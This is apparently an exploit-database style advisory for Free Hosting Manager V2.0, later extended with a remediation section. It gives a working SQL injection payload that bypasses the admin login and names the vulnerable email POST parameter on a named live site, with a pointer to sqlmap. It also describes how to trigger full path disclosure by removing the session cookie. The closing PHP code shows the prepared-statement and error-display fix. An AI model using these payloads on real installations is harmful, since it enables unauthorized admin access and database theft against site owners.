
Free Hosting Manager V2.0 sql injection (post) & Full Path Disclosure

Author: hamza killer, Published: 04-03-2014
#########################################################################################
# Free Hosting Manager V2.0 SQL injection (POST) & admin bypass & Full Path Disclosure #
# Author : hamza killer #
# E-mail : hlyzidi@gmail.com #
# GoogleDork: -_- !!! #
# Vendor :http://www.fhm-script.com/ #
# Thx TO : sec4ever members & sec4all &aircrack-ng #
########################################################################################
Admin bypass (credited to aircrack-ng)
=============
Just type in the user field:
' or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -

SQL injection (POST method):
=========================
In admin/login.php:

if ($_GET['do'] == 'send') {
    $email = $_POST['email'];                   // user-controlled, no validation or escaping
    $timestamp = strtotime("now");
    $ip = $_SERVER['REMOTE_ADDR'];
    // $email is concatenated directly into the SQL string
    $adminemails2 = "SELECT * FROM adminusers WHERE email='$email'";
    $adminemails = mysql_query($adminemails2);  // injection point

EXPLOIT:
webqth.com/admin/login.php?act=remind
POST:
email=[injection here]
Exploit it manually or use sqlmap.
=========================
Full Path Disclosure
====================
webqth.com/admin/login.php
Use any header-editing tool to remove the Cookie: PHPSESSID= header from the request.
Screenshot:
http://im79.gulfup.com/F36BS.png
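For the fix side of both findings above (the unescaped email lookup in the remind handler, and the path disclosure that comes from PHP printing warnings to the page), here is an added example, not FHM's own code: the same adminusers lookup rewritten with a mysqli prepared statement, plus the error-display settings that stop file paths leaking. It assumes a mysqli connection $db and the adminusers/email table and column shown in the advisory; the function name is hypothetical.

```php
<?php
// Added example (not part of the FHM code base): hardened form of the
// remind-password lookup quoted in the advisory.

// Full Path Disclosure fix: never render warnings to the client; log them instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/**
 * Look up an admin account by e-mail without letting the value touch the SQL text.
 * Assumes $db is an open mysqli connection and the table is adminusers(email, ...).
 */
function find_admin_by_email(mysqli $db, string $email): ?array
{
    // Allow-list check first: anything that is not a syntactically valid address
    // (quotes, comment markers, "or 1" fragments) is rejected before any query runs.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }

    // The '?' placeholder is bound as data by the driver, so the original
    //   "SELECT * FROM adminusers WHERE email='$email'"
    // can no longer be rewritten by whatever the client sends.
    $stmt = $db->prepare("SELECT * FROM adminusers WHERE email = ?");
    if ($stmt === false) {
        return null;  // prepare failures are logged by PHP, not shown to the user
    }
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}
```

The same pattern applies to the username field used in the admin-bypass payload: bind it as a parameter and the GROUP BY / rand() trick is stored as a literal string instead of being parsed as SQL.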